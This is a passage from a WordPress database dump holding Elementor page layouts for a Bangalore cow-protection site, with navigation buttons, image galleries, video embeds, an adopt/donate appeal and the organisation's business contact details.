"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10464,1744,'_elementor_page_assets','a:0:{}'),(10466,1745,'_elementor_edit_mode','builder'),(10467,1745,'_elementor_template_type','wp-page'),(10468,1745,'_elementor_version','3.7.8'),(10469,1745,'_wp_page_template','elementor_canvas'),(10470,1745,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10471,1745,'_elementor_page_assets','a:0:{}'),(10474,1747,'_elementor_edit_mode','builder'),(10475,1747,'_elementor_template_type','wp-page'),(10476,1747,'_elementor_version','3.7.8'),(10477,1747,'_wp_page_template','default'),(10478,1747,'_elementor_data','[{\"id\":\"3d9de82\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\"},\"elements\":[{\"id\":\"5605bb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"eeb943c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-123.png\",\"id\":1725,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"space\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"-55\",\"right\":\"-12\",\"bottom\":\"0\",\"left\":\"-25\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b1e0e0a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1e51603\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d48ab42\",\"elType\":\"widget\",\"settings\":{\"text\":\"Donate\",\"align\":\"center\",\"background_color\":\"#2A3F2D\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"49e13ac\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"fe61f38\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"8c33583\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It\\u2019s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it\\u2019s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(10479,1747,'_elementor_page_assets','a:0:{}'),(10480,1747,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(10482,1748,'_elementor_edit_mode','builder'),(10483,1748,'_elementor_template_type','wp-page'),(10484,1748,'_elementor_version','3.7.8'),(10485,1748,'_wp_page_template','elementor_canvas'),(10486,1748,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About 